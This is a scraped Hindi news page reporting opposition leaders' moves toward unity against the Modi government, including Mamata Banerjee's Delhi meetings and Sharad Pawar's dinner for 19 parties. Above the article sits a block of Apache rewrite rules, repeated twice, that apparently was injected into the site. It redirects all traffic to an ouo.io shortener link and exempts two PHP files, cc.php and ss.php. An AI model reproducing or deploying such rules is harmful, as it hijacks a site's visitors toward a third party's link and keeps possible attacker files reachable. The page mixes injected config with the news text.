
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 678
Previous Nextनई दिल्ली। विपक्षी दलों द्वारा मोदी सरकार के खिलाफ अविश्वास प्रस्ताव का नोटिस दिए जाने के बाद अब सभी विपक्षी दल मिशन 2019 को लेकर एकजुट होते नजर आ रहे हैं। इसी संदर्भ में आज नई दिल्ली में टीएमसी सुप्रीमो ममता बनर्जी विपक्षी दलों से मुलाकात भी करेंगी। खास बात यह है कि कांग्रेस समेत विपक्षी दल बीजेपी के नेतृत्व वाली NDA सरकार के खिलाफ गठबंधन की राजनीति पर आगे बढ़ रहे हैं। यूपी उपचुनाव में एसपी-बीएसपी के बीच हुआ गठजोड़ इसका ताजा उदाहरण है। इसी क्रम में ममता बनर्जी आज दिल्ली में हैं और वह अगले 3 दिनों तक विपक्षी दलों के नेताओं से मुलाकात करेंगी। उधर, एनसीपी प्रमुख शरद पवार ने आज ही 19 विपक्षी दलों के नेताओं को डिनर पर बुलाया है। पवार की डिनर पॉलिटिक्स को भी विपक्षी एकजुटता के लिहाज से काफी महत्वपूर्ण माना जा रहा है। ममता की सोनिया गांधी से मुलाकात तय नहीं है क्योंकि पूर्व कांग्रेस चीफ अस्वस्थ हैं। हालांकि NCP चीफ शरद पवार से उनकी मुलाकात तय है। यहीं नहीं, आज पूरे दिन ममता बनर्जी संसद भवन में रहकर विपक्षी दलों के सांसदों से मुलाकात करने वाली हैं। बताया जा रहा है कि ममता हाल ही में एनडीए सरकार से अलग हुई चंद्रबाबू नायडू की पार्टी TDP के सांसदों से भी मिलेंगी। आपको बता दें कि विपक्षी एकजुटता की यह पहल ऐसे समय में हो रही है जब संसद में टीडीपी, कांग्रेस समेत 4 दलों ने मोदी सरकार के खिलाफ अविश्वास प्रस्ताव का नोटिस दिया है। ममता ने इससे पहले कोलकाता से ही चंद्रबाबू से फोन पर बात की थी। दिल्ली के लिए रवाना होने से पहले ममता ने कहा कि वह विभिन्न पार्टियों के अपने मित्रों से मुलाकात करेंगी।